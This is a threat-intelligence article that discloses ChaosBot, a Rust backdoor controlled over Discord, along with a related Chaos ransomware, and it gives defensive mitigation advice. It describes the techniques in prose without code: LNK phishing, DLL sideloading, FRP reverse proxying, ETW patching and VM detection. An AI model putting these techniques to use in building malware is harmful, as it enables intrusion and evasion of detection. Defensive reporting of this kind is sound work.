ChaosBot: Rust Backdoor Using Discord for Command-and-Control

Security researchers have disclosed a new Rust-based backdoor called ChaosBot that enables attackers to perform reconnaissance and execute arbitrary commands on compromised Windows hosts. First observed in late September 2025 within a financial services environment, the malware is notable both for its use of Discord as a command-and-control (C2) channel and for multiple deployment vectors including credential abuse and phishing.

Infection and Lateral Movement

eSentire’s investigation found that threat actors leveraged compromised credentials — including a Cisco VPN account and an over-privileged Active Directory account named serviceaccount — to run remote commands via WMI, allowing broad execution across the network. In other campaigns, the initial delivery relied on phishing messages containing malicious Windows shortcut (LNK) files. Opening the LNK triggers a PowerShell command that downloads and runs the ChaosBot payload while showing a decoy PDF (e.g., purported correspondence) to distract the victim.

Payload and Command Channel

The deployed payload is a DLL (reported as msedge_elf.dll) sideloaded via a Microsoft Edge binary (identity_helper.exe). After loading, ChaosBot performs system reconnaissance and downloads a fast reverse proxy (FRP) to establish a persistent reverse proxy into the compromised network. Operators have attempted (with mixed success) to provision VS Code Tunnels as alternate backdoors. In practice, ChaosBot primarily uses Discord: operators maintain Discord accounts (e.g., chaos_00019, lovebb0024) and create channels named for infected machines to issue commands and receive exfiltrated data.

Supported capabilities observed include: executing shell commands, capturing screenshots, uploading/downloading files, and sending captured files to the Discord channel.

Evasion Techniques

Newer ChaosBot variants include anti-analysis measures:

• ETW bypass: patching the first instructions of ntdll!EtwEventWrite to neutralize Event Tracing for Windows.

• VM detection: checking MAC address prefixes associated with VMware/VirtualBox and terminating if a match is found.

These techniques aim to hinder detection and forensic analysis.

Related Destructive Ransomware Developments

Separately, Fortinet researchers described a Chaos-branded C++ ransomware that combines destructive deletion (targeting files above certain sizes) with clipboard hijacking that swaps cryptocurrency addresses to redirect funds. The ransomware masquerades as utilities (e.g., “System Optimizer”) and uses a variety of encryption and fallback methods, adding a financially motivated destructive element to the broader Chaos ecosystem.

Detection, Response, and Mitigation

Organizations should: enforce least privilege for service accounts, harden VPN and AD credentials (MFA, rotation), monitor for anomalous WMI and lateral movement, block suspicious outbound domains and Discord-related C2 traffic where appropriate, and inspect incoming LNK attachments. Endpoint telemetry and EDR solutions should be tuned to detect DLL sideloading patterns, FRP use, and ETW tampering. Prompt threat hunting and incident response are essential once compromise is suspected.